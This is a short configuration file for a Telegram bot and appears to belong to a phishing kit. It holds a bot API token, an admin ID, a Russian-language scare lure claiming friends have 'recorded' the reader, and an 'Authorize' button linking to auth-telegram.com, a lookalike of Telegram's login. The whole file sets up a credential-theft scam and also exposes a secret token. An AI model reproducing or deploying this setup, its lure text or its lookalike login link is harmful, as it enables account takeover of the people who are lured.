# - *- coding: utf- 8 - *-
[SETTINGS]
TOKEN=5281411676:AAFugPCyQeU0c5PcFIBcTn7f8kmpZFQZwCc
start_text=😱 Бегиии! смотреть как тебя запuсалиu друзья 🔔 Бот полностью работает как обычно

web_button_name=Авторизоваться
web_url=https://auth-telegram.com/auth?ref=e64f1f48-e61a-4584-82fd-19f6a7a0b9af

[PHOTO]
file_type=png
;file_type - png

[ADMIN]
admin_id=1361816235